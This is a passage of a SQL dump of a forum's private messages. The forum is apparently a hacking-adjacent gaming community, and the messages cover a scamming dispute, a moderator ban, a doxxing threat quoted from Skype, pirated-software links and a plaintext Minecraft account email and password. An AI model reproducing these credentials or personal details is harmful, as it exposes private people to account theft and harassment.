'1350400208'); INSERT INTO mybb_privatemessages VALUES('3233', '228', '53', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'Google Sniper 2.0', '0', 'Download Link: http://tpb.anonhi.de/torrent/6555567/Google_Sniper_2.0\r\n\r\nIt\'s a torrent file!', '1350386957', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3234', '62', '62', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'Google Sniper 2.0', '0', 'Download Link: http://tpb.anonhi.de/torrent/6555567/Google_Sniper_2.0\r\n\r\nIt\'s a torrent file!', '1350386988', '0', '1', '0', '1', '0', '2', '1350388849'); INSERT INTO mybb_privatemessages VALUES('3235', '228', '62', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'Google Sniper 2.0', '0', 'Download Link: http://tpb.anonhi.de/torrent/6555567/Google_Sniper_2.0\r\n\r\nIt\'s a torrent file!', '1350386988', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3236', '82', '82', '254', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '1', 'Re: You\'re Funny', '0', '[quote=\'iTzIpod\']\r\nI see you were on the AQW account earlier today.\r\nI hope you are enjoying the AQW Account + the MC Account.\r\nBecause you sir.\r\nScammed me...\r\n\r\nYou simply went on your email. And then clicked saying that you did not make this request. And changed the password and the email. Using your Master Account. \r\n\r\nI can tell you logged on the account because \r\n1. I was never equipping those items.\r\n2. My password is incorrect. You changed it obviously.\r\n3. My email was changed also. I can\'t recover the account using my email.\r\n4. You didn\'t go on Skype talking to me explaining what happened or anything.\r\n5. You scammed me. :)\r\n\r\nEnjoy the accounts. \r\n[/quote]\r\n\r\nWhat if, hear me out, what if My computer was hacked, everything I owned all my accounts and I took all my time to get them back? \r\nAnd no I couldn\'t of gotten it back through that email, because that email confirmation was already used and couldn\'t be used again. The hacker got hold of my email, That holds every single payment purchase I made. I found out this yesterday that you could change the email by the transaction Id of the purchase, So it\'s not under my email no more. I had to redo my whole computer and every single of my accounts I had. You know how bad this sucks? I have to go around installing lots of crap onto my god damn computer! And I\'m fucking pissed. I\'ll talk to you later but right now I got work to do. ', '1350394035', '0', '3', '1350415423', '1', '0', '2', '1350415353'); INSERT INTO mybb_privatemessages VALUES('3237', '254', '82', '254', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: You\'re Funny', '0', '[quote=\'iTzIpod\']\r\nI see you were on the AQW account earlier today.\r\nI hope you are enjoying the AQW Account + the MC Account.\r\nBecause you sir.\r\nScammed me...\r\n\r\nYou simply went on your email. And then clicked saying that you did not make this request. And changed the password and the email. Using your Master Account. \r\n\r\nI can tell you logged on the account because \r\n1. I was never equipping those items.\r\n2. My password is incorrect. You changed it obviously.\r\n3. My email was changed also. I can\'t recover the account using my email.\r\n4. You didn\'t go on Skype talking to me explaining what happened or anything.\r\n5. You scammed me. :)\r\n\r\nEnjoy the accounts. \r\n[/quote]\r\n\r\nWhat if, hear me out, what if My computer was hacked, everything I owned all my accounts and I took all my time to get them back? \r\nAnd no I couldn\'t of gotten it back through that email, because that email confirmation was already used and couldn\'t be used again. The hacker got hold of my email, That holds every single payment purchase I made. I found out this yesterday that you could change the email by the transaction Id of the purchase, So it\'s not under my email no more. I had to redo my whole computer and every single of my accounts I had. You know how bad this sucks? I have to go around installing lots of crap onto my god damn computer! And I\'m fucking pissed. I\'ll talk to you later but right now I got work to do. ', '1350394035', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3239', '62', '62', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'GFX Question', '0', 'Hey man, so I want to get into some GFX and was wondering if you could send me the program you use to make stuff. I\'m assuming its an adobe product? Thanks for your time, I\'m really new to this. ;D', '1350402659', '0', '3', '1350408147', '1', '0', '2', '1350408105'); INSERT INTO mybb_privatemessages VALUES('3240', '100', '62', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'GFX Question', '0', 'Hey man, so I want to get into some GFX and was wondering if you could send me the program you use to make stuff. I\'m assuming its an adobe product? Thanks for your time, I\'m really new to this. ;D', '1350402659', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3242', '254', '1', '254', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Just ban me', '0', 'If there not going to listen, just ban me I have a lot of things to do like recovering all my accounts and my credit card from a hacker. So i\'ll see you when ever.', '1350404662', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3243', '100', '100', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '1', 'Re: GFX Question', '0', '[quote=\'??zg???g????61\']\r\nHey man, so I want to get into some GFX and was wondering if you could send me the program you use to make stuff. I\'m assuming its an adobe product? Thanks for your time, I\'m really new to this. ;D\r\n[/quote]\r\n\r\nit\'s called adobe photoshop CS6 (the newest one) probably the easiest one too.', '1350408147', '0', '3', '1350413778', '1', '0', '2', '1350413735'); INSERT INTO mybb_privatemessages VALUES('3244', '62', '100', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '2', 'Re: GFX Question', '0', '[quote=\'??zg???g????61\']\r\nHey man, so I want to get into some GFX and was wondering if you could send me the program you use to make stuff. I\'m assuming its an adobe product? Thanks for your time, I\'m really new to this. ;D\r\n[/quote]\r\n\r\nit\'s called adobe photoshop CS6 (the newest one) probably the easiest one too.', '1350408147', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3246', '62', '62', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'Re: GFX Question', '0', '[quote=\'R?????zo?\']\r\n[quote=\'??zg???g????61\']\r\nHey man, so I want to get into some GFX and was wondering if you could send me the program you use to make stuff. I\'m assuming its an adobe product? Thanks for your time, I\'m really new to this. ;D\r\n[/quote]\r\n\r\nit\'s called adobe photoshop CS6 (the newest one) probably the easiest one too.\r\n[/quote]\r\n\r\nOh photoshop? Did you buy it?! 0_____0', '1350413778', '0', '3', '1350424983', '1', '0', '2', '1350424963'); INSERT INTO mybb_privatemessages VALUES('3247', '100', '62', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'Re: GFX Question', '0', '[quote=\'R?????zo?\']\r\n[quote=\'??zg???g????61\']\r\nHey man, so I want to get into some GFX and was wondering if you could send me the program you use to make stuff. I\'m assuming its an adobe product? Thanks for your time, I\'m really new to this. ;D\r\n[/quote]\r\n\r\nit\'s called adobe photoshop CS6 (the newest one) probably the easiest one too.\r\n[/quote]\r\n\r\nOh photoshop? Did you buy it?! 0_____0', '1350413778', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3248', '254', '254', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"254\";}}', '1', 'Re: You\'re Funny', '0', '[quote=\'Greed\']\r\n[quote=\'iTzIpod\']\r\nI see you were on the AQW account earlier today.\r\nI hope you are enjoying the AQW Account + the MC Account.\r\nBecause you sir.\r\nScammed me...\r\n\r\nYou simply went on your email. And then clicked saying that you did not make this request. And changed the password and the email. Using your Master Account. \r\n\r\nI can tell you logged on the account because \r\n1. I was never equipping those items.\r\n2. My password is incorrect. You changed it obviously.\r\n3. My email was changed also. I can\'t recover the account using my email.\r\n4. You didn\'t go on Skype talking to me explaining what happened or anything.\r\n5. You scammed me. :)\r\n\r\nEnjoy the accounts. \r\n[/quote]\r\n\r\nWhat if, hear me out, what if My computer was hacked, everything I owned all my accounts and I took all my time to get them back? \r\nAnd no I couldn\'t of gotten it back through that email, because that email confirmation was already used and couldn\'t be used again. The hacker got hold of my email, That holds every single payment purchase I made. I found out this yesterday that you could change the email by the transaction Id of the purchase, So it\'s not under my email no more. I had to redo my whole computer and every single of my accounts I had. You know how bad this sucks? I have to go around installing lots of crap onto my god damn computer! And I\'m fucking pissed. I\'ll talk to you later but right now I got work to do. \r\n[/quote]\r\n\r\nReally weird don\'t you think?\r\nI\'m not even going to bother...', '1350415423', '0', '1', '0', '1', '0', '0', '1350416842'); INSERT INTO mybb_privatemessages VALUES('3249', '82', '254', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"254\";}}', '2', 'Re: You\'re Funny', '0', '[quote=\'Greed\']\r\n[quote=\'iTzIpod\']\r\nI see you were on the AQW account earlier today.\r\nI hope you are enjoying the AQW Account + the MC Account.\r\nBecause you sir.\r\nScammed me...\r\n\r\nYou simply went on your email. And then clicked saying that you did not make this request. And changed the password and the email. Using your Master Account. \r\n\r\nI can tell you logged on the account because \r\n1. I was never equipping those items.\r\n2. My password is incorrect. You changed it obviously.\r\n3. My email was changed also. I can\'t recover the account using my email.\r\n4. You didn\'t go on Skype talking to me explaining what happened or anything.\r\n5. You scammed me. :)\r\n\r\nEnjoy the accounts. \r\n[/quote]\r\n\r\nWhat if, hear me out, what if My computer was hacked, everything I owned all my accounts and I took all my time to get them back? \r\nAnd no I couldn\'t of gotten it back through that email, because that email confirmation was already used and couldn\'t be used again. The hacker got hold of my email, That holds every single payment purchase I made. I found out this yesterday that you could change the email by the transaction Id of the purchase, So it\'s not under my email no more. I had to redo my whole computer and every single of my accounts I had. You know how bad this sucks? I have to go around installing lots of crap onto my god damn computer! And I\'m fucking pissed. I\'ll talk to you later but right now I got work to do. \r\n[/quote]\r\n\r\nReally weird don\'t you think?\r\nI\'m not even going to bother...', '1350415423', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3250', '61', '61', '254', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '1', 'Hello', '0', 'I want you to know me and that one guy talked on skype and he said he is going to give my dox out. I just want to say if he puts my dox on here he can and who ever use the info will be reported to the fed\'s.', '1350420124', '0', '3', '1350420242', '1', '0', '2', '1350420210'); INSERT INTO mybb_privatemessages VALUES('3251', '254', '61', '254', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'Hello', '0', 'I want you to know me and that one guy talked on skype and he said he is going to give my dox out. I just want to say if he puts my dox on here he can and who ever use the info will be reported to the fed\'s.', '1350420124', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3252', '254', '254', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"254\";}}', '1', 'Re: Hello', '0', '[quote=\'Greed\']\r\nI want you to know me and that one guy talked on skype and he said he is going to give my dox out. I just want to say if he puts my dox on here he can and who ever use the info will be reported to the fed\'s.\r\n[/quote]\r\n\r\nWho is threating to release A dox? Ipod?', '1350420242', '0', '3', '1350420354', '1', '0', '2', '1350420251'); INSERT INTO mybb_privatemessages VALUES('3253', '61', '254', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"254\";}}', '2', 'Re: Hello', '0', '[quote=\'Greed\']\r\nI want you to know me and that one guy talked on skype and he said he is going to give my dox out. I just want to say if he puts my dox on here he can and who ever use the info will be reported to the fed\'s.\r\n[/quote]\r\n\r\nWho is threating to release A dox? Ipod?', '1350420242', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3254', '61', '61', '254', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '1', 'Re: Hello', '0', '[quote=\'NXK\']\r\n[quote=\'Greed\']\r\nI want you to know me and that one guy talked on skype and he said he is going to give my dox out. I just want to say if he puts my dox on here he can and who ever use the info will be reported to the fed\'s.\r\n[/quote]\r\n\r\nWho is threating to release A dox? Ipod?\r\n[/quote]\r\n yes,[3:16:08 PM] Ryan | Jacob: Okay.\r\n[3:16:12 PM] Ryan | Jacob: Your dox is going up.\r\n[3:16:23 PM] Ryan | Jacob: Not like you\'ll care anyways.\r\n[3:16:28 PM] Zane Anderson: whats a dox?\r\n[3:16:52 PM] Ryan | Jacob: Don\'t worry...\r\n\r\n\r\nEnjoy your dox\r\n[3:37:06 PM] Ryan | Jacob: + your accounts\r\n[3:37:10 PM] Ryan | Jacob: + your ban\r\n[3:37:10 PM] Zane Anderson: dox?\r\n[3:37:14 PM] Ryan | Jacob: :)\r\n[3:37:20 PM] Ryan | Jacob: Bye\r\n[3:37:23 PM] Zane Anderson: whats a dox\r\n', '1350420354', '0', '3', '1350420501', '1', '0', '2', '1350420379'); INSERT INTO mybb_privatemessages VALUES('3255', '254', '61', '254', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'Re: Hello', '0', '[quote=\'NXK\']\r\n[quote=\'Greed\']\r\nI want you to know me and that one guy talked on skype and he said he is going to give my dox out. I just want to say if he puts my dox on here he can and who ever use the info will be reported to the fed\'s.\r\n[/quote]\r\n\r\nWho is threating to release A dox? Ipod?\r\n[/quote]\r\n yes,[3:16:08 PM] Ryan | Jacob: Okay.\r\n[3:16:12 PM] Ryan | Jacob: Your dox is going up.\r\n[3:16:23 PM] Ryan | Jacob: Not like you\'ll care anyways.\r\n[3:16:28 PM] Zane Anderson: whats a dox?\r\n[3:16:52 PM] Ryan | Jacob: Don\'t worry...\r\n\r\n\r\nEnjoy your dox\r\n[3:37:06 PM] Ryan | Jacob: + your accounts\r\n[3:37:10 PM] Ryan | Jacob: + your ban\r\n[3:37:10 PM] Zane Anderson: dox?\r\n[3:37:14 PM] Ryan | Jacob: :)\r\n[3:37:20 PM] Ryan | Jacob: Bye\r\n[3:37:23 PM] Zane Anderson: whats a dox\r\n', '1350420354', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3256', '254', '254', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"254\";}}', '1', 'Re: Hello', '0', 'Talking to him VIA skype.\r\n\r\nI warned him.', '1350420501', '0', '3', '1350420550', '1', '0', '2', '1350420507'); INSERT INTO mybb_privatemessages VALUES('3257', '61', '254', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"254\";}}', '2', 'Re: Hello', '0', 'Talking to him VIA skype.\r\n\r\nI warned him.', '1350420501', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3258', '61', '61', '254', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '1', 'Re: Hello', '0', '[quote=\'NXK\']\r\nTalking to him VIA skype.\r\n\r\nI warned him.\r\n[/quote]\r\n\r\nokay thank you, I using a vpn just in case.', '1350420550', '0', '1', '0', '1', '0', '2', '1350420690'); INSERT INTO mybb_privatemessages VALUES('3259', '254', '61', '254', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'Re: Hello', '0', '[quote=\'NXK\']\r\nTalking to him VIA skype.\r\n\r\nI warned him.\r\n[/quote]\r\n\r\nokay thank you, I using a vpn just in case.', '1350420550', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3260', '228', '228', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '1', 'Proof.', '0', 'Take a Look at that scamming thread, I need a second opinion here. Should I ban him since Ipod proved it and greed isn\'t responding or what\'s your opinion?', '1350421024', '0', '1', '0', '1', '0', '0', '1350421114'); INSERT INTO mybb_privatemessages VALUES('3261', '61', '228', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Proof.', '0', 'Take a Look at that scamming thread, I need a second opinion here. Should I ban him since Ipod proved it and greed isn\'t responding or what\'s your opinion?', '1350421024', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3262', '254', '254', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"254\";}}', '1', 'Re: Just ban me', '0', '[quote=\'Greed\']\r\nIf there not going to listen, just ban me I have a lot of things to do like recovering all my accounts and my credit card from a hacker. So i\'ll see you when ever.\r\n[/quote]\r\n\r\nSorry but I cant till I find outntue real scammer.', '1350421244', '0', '3', '1350421382', '1', '0', '0', '1350421249'); INSERT INTO mybb_privatemessages VALUES('3263', '61', '61', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '1', 'RE: Proof', '0', 'Hi,\r\n\r\nI Think we should ban him, because Ipod has good proof and Greed is not responding on PM messages. If we don\'t ban him we come to soft over to everyone. But this is my opinion. What did Joker say? ', '1350421319', '0', '3', '1350421353', '1', '0', '2', '1350421323'); INSERT INTO mybb_privatemessages VALUES('3264', '228', '61', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'RE: Proof', '0', 'Hi,\r\n\r\nI Think we should ban him, because Ipod has good proof and Greed is not responding on PM messages. If we don\'t ban him we come to soft over to everyone. But this is my opinion. What did Joker say? ', '1350421319', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3265', '228', '228', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '1', 'Re: Proof', '0', '[quote=\'VirtualLegend\']\r\nHi,\r\n\r\nI Think we should ban him, because Ipod has good proof and Greed is not responding on PM messages. If we don\'t ban him we come to soft over to everyone. But this is my opinion. What did Joker say? \r\n[/quote]\r\n\r\nTaking this one in our hands, He said he was leaving this one for us to decide. Ill take action and Do it.', '1350421353', '0', '3', '1350421494', '1', '0', '2', '1350421462'); INSERT INTO mybb_privatemessages VALUES('3266', '61', '228', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Re: Proof', '0', '[quote=\'VirtualLegend\']\r\nHi,\r\n\r\nI Think we should ban him, because Ipod has good proof and Greed is not responding on PM messages. If we don\'t ban him we come to soft over to everyone. But this is my opinion. What did Joker say? \r\n[/quote]\r\n\r\nTaking this one in our hands, He said he was leaving this one for us to decide. Ill take action and Do it.', '1350421353', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3387', '257', '100', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '2', 'that minecraft account ', '0', 'hey here is that premium account please dont change the passwordddddd\r\nusername:the.big.d.man@hotmail.com\r\npassword:chicken737\r\nplease dont change it.\r\nplease say thanks on the thread\r\nrep me if i helped you \r\nand rate the thread if i helped you \r\ndont change the password pleaseeeeeeeee or you this preivelige will be taken off you and i will -rep you :)', '1350589563', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3268', '254', '1', '254', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Just ban me', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'Greed\']\r\nIf there not going to listen, just ban me I have a lot of things to do like recovering all my accounts and my credit card from a hacker. So i\'ll see you when ever.\r\n[/quote]\r\n\r\nSorry but I cant till I find outntue real scammer.\r\n[/quote]\r\n\r\nSo you cant ban me? So I have to listen to all of this accusing of me?', '1350421382', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3269', '61', '61', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '1', 'Re: Proof', '0', '[quote=\'NXK\']\r\n[quote=\'VirtualLegend\']\r\nHi,\r\n\r\nI Think we should ban him, because Ipod has good proof and Greed is not responding on PM messages. If we don\'t ban him we come to soft over to everyone. But this is my opinion. What did Joker say? \r\n[/quote]\r\n\r\nTaking this one in our hands, He said he was leaving this one for us to decide. Ill take action and Do it.\r\n[/quote]\r\n\r\nOkay Thank you for letting me know ', '1350421494', '0', '1', '0', '1', '0', '2', '1350421541'); INSERT INTO mybb_privatemessages VALUES('3270', '228', '61', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'Re: Proof', '0', '[quote=\'NXK\']\r\n[quote=\'VirtualLegend\']\r\nHi,\r\n\r\nI Think we should ban him, because Ipod has good proof and Greed is not responding on PM messages. If we don\'t ban him we come to soft over to everyone. But this is my opinion. What did Joker say? \r\n[/quote]\r\n\r\nTaking this one in our hands, He said he was leaving this one for us to decide. Ill take action and Do it.\r\n[/quote]\r\n\r\nOkay Thank you for letting me know ', '1350421494', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3271', '254', '254', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"254\";}}', '1', 'Re: Just ban me', '0', '[quote=\'Greed\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Greed\']\r\nIf there not going to listen, just ban me I have a lot of things to do like recovering all my accounts and my credit card from a hacker. So i\'ll see you when ever.\r\n[/quote]\r\n\r\nSorry but I cant till I find outntue real scammer.\r\n[/quote]\r\n\r\nSo you cant ban me? So I have to listen to all of this accusing of me?\r\n[/quote]\r\n\r\nYou can provide proof to back you up and get the reporter banned only if you are the one who got scammed.', '1350421496', '0', '1', '0', '1', '0', '0', '1350421505'); INSERT INTO mybb_privatemessages VALUES('3272', '254', '254', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"254\";}}', '1', 'Ban', '0', 'Since It was offsite You will not be Permentely Banned.\r\n\r\nScamming no matter what Is not allowed, And you have failed to provide any actual proof you didn\'t Do it.', '1350421676', '0', '1', '0', '1', '0', '2', '1350421707'); INSERT INTO mybb_privatemessages VALUES('3273', '61', '254', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"254\";}}', '2', 'Ban', '0', 'Since It was offsite You will not be Permentely Banned.\r\n\r\nScamming no matter what Is not allowed, And you have failed to provide any actual proof you didn\'t Do it.', '1350421676', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3275', '100', '100', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '1', 'Re: GFX Question', '0', '[quote=\'??zg???g????61\']\r\n[quote=\'R?????zo?\']\r\n[quote=\'??zg???g????61\']\r\nHey man, so I want to get into some GFX and was wondering if you could send me the program you use to make stuff. I\'m assuming its an adobe product? Thanks for your time, I\'m really new to this. ;D\r\n[/quote]\r\n\r\nit\'s called adobe photoshop CS6 (the newest one) probably the easiest one too.\r\n[/quote]\r\n\r\nOh photoshop? Did you buy it?! 0_____0\r\n[/quote]\r\n\r\njust get a cracked version.', '1350424983', '0', '3', '1350425885', '1', '0', '2', '1350425759'); INSERT INTO mybb_privatemessages VALUES('3276', '62', '100', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '2', 'Re: GFX Question', '0', '[quote=\'??zg???g????61\']\r\n[quote=\'R?????zo?\']\r\n[quote=\'??zg???g????61\']\r\nHey man, so I want to get into some GFX and was wondering if you could send me the program you use to make stuff. I\'m assuming its an adobe product? Thanks for your time, I\'m really new to this. ;D\r\n[/quote]\r\n\r\nit\'s called adobe photoshop CS6 (the newest one) probably the easiest one too.\r\n[/quote]\r\n\r\nOh photoshop? Did you buy it?! 0_____0\r\n[/quote]\r\n\r\njust get a cracked version.', '1350424983', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3278', '266', '61', '266', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'Hey', '0', 'Can I have your skype so I can talk to you personally.', '1350425705', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3279', '62', '62', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'Re: GFX Question', '0', '[quote=\'R?????zo?\']\r\n[quote=\'??zg???g????61\']\r\n[quote=\'R?????zo?\']\r\n[quote=\'??zg???g????61\']\r\nHey man, so I want to get into some GFX and was wondering if you could send me the program you use to make stuff. I\'m assuming its an adobe product? Thanks for your time, I\'m really new to this. ;D\r\n[/quote]\r\n\r\nit\'s called adobe photoshop CS6 (the newest one) probably the easiest one too.\r\n[/quote]\r\n\r\nOh photoshop? Did you buy it?! 0_____0\r\n[/quote]\r\n\r\njust get a cracked version.\r\n[/quote]\r\n\r\nOh last time I checked (bout a month ago) there were none. Thanks! You think you could possibly teach me some stuff? \r\n', '1350425885', '0', '1', '0', '1', '0', '2', '1350426038'); INSERT INTO mybb_privatemessages VALUES('3280', '100', '62', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'Re: GFX Question', '0', '[quote=\'R?????zo?\']\r\n[quote=\'??zg???g????61\']\r\n[quote=\'R?????zo?\']\r\n[quote=\'??zg???g????61\']\r\nHey man, so I want to get into some GFX and was wondering if you could send me the program you use to make stuff. I\'m assuming its an adobe product? Thanks for your time, I\'m really new to this. ;D\r\n[/quote]\r\n\r\nit\'s called adobe photoshop CS6 (the newest one) probably the easiest one too.\r\n[/quote]\r\n\r\nOh photoshop? Did you buy it?! 0_____0\r\n[/quote]\r\n\r\njust get a cracked version.\r\n[/quote]\r\n\r\nOh last time I checked (bout a month ago) there were none. Thanks! You think you could possibly teach me some stuff? \r\n', '1350425885', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3282', '266', '228', '266', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'hey', '0', 'Since your a mod, can I talk to you?', '1350426224', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3284', '61', '266', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"266\";}}', '2', 'Re: Hey', '0', '[quote=\'King Of Dunces\']\r\nCan I have your skype so I can talk to you personally.\r\n[/quote]\r\n\r\nNo Sorry.', '1350426921', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3286', '228', '266', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"266\";}}', '2', 'RE: hey', '0', 'Add me on Skype: VirtualLegend', '1350427087', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3287', '100', '100', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '1', 'Custom Pastebin Source Code', '0', 'Here you go, Enjoy \r\nhttp://www.mediafire.com/download.php?bhiaiyz3op0d2go', '1350427220', '0', '1', '0', '1', '0', '2', '1350427270'); INSERT INTO mybb_privatemessages VALUES('3288', '3', '100', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '2', 'Custom Pastebin Source Code', '0', 'Here you go, Enjoy \r\nhttp://www.mediafire.com/download.php?bhiaiyz3op0d2go', '1350427220', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3289', '62', '62', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', '[All Members] Advance Member System', '0', 'Here you go Enjoy\r\n\r\nhttp://www.mediafire.com/download.php?hny4mxznomkje5t', '1350427402', '0', '1', '0', '1', '0', '2', '1350459776'); INSERT INTO mybb_privatemessages VALUES('3290', '3', '62', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', '[All Members] Advance Member System', '0', 'Here you go Enjoy\r\n\r\nhttp://www.mediafire.com/download.php?hny4mxznomkje5t', '1350427402', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3291', '222', '222', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '1', 'Hi', '0', 'Are You from europe ?', '1350429262', '0', '3', '1350433420', '1', '0', '2', '1350433403'); INSERT INTO mybb_privatemessages VALUES('3292', '228', '222', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '2', 'Hi', '0', 'Are You from europe ?', '1350429262', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3293', '82', '82', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '1', 'So', '0', 'I would like to address a couple of things.\r\n\r\nI\'m feel sorry to hear about the scam. I have reported his IP to an online scammers DB and I will report it to his ISP if you can provide a screenshot because they require a SS.\r\n\r\nDid you forgive me for what happened few weeks ago?', '1350430021', '0', '1', '0', '1', '0', '0', '1350435095'); INSERT INTO mybb_privatemessages VALUES('3294', '228', '228', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '1', 'Re: Hi', '0', '[quote=\'VirtualLegend\']\r\nAre You from europe ?\r\n[/quote]\r\n\r\nno why?', '1350433420', '0', '1', '0', '1', '0', '2', '1350435970'); INSERT INTO mybb_privatemessages VALUES('3295', '222', '228', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Re: Hi', '0', '[quote=\'VirtualLegend\']\r\nAre You from europe ?\r\n[/quote]\r\n\r\nno why?', '1350433420', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3296', '62', '62', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'GFX Request (sorry for so much talking) ', '0', 'Hey, sorry for contacting you a lot lol, but you think you could make me a userbar that says \"DDoS\'ers\" ? I\'m changing ratters to DDoS\'ers because I like networking much more then ratting. Thanks', '1350433612', '0', '1', '0', '1', '0', '2', '1350459664'); INSERT INTO mybb_privatemessages VALUES('3297', '100', '62', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'GFX Request (sorry for so much talking) ', '0', 'Hey, sorry for contacting you a lot lol, but you think you could make me a userbar that says \"DDoS\'ers\" ? I\'m changing ratters to DDoS\'ers because I like networking much more then ratting. Thanks', '1350433612', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3298', '228', '228', '222', 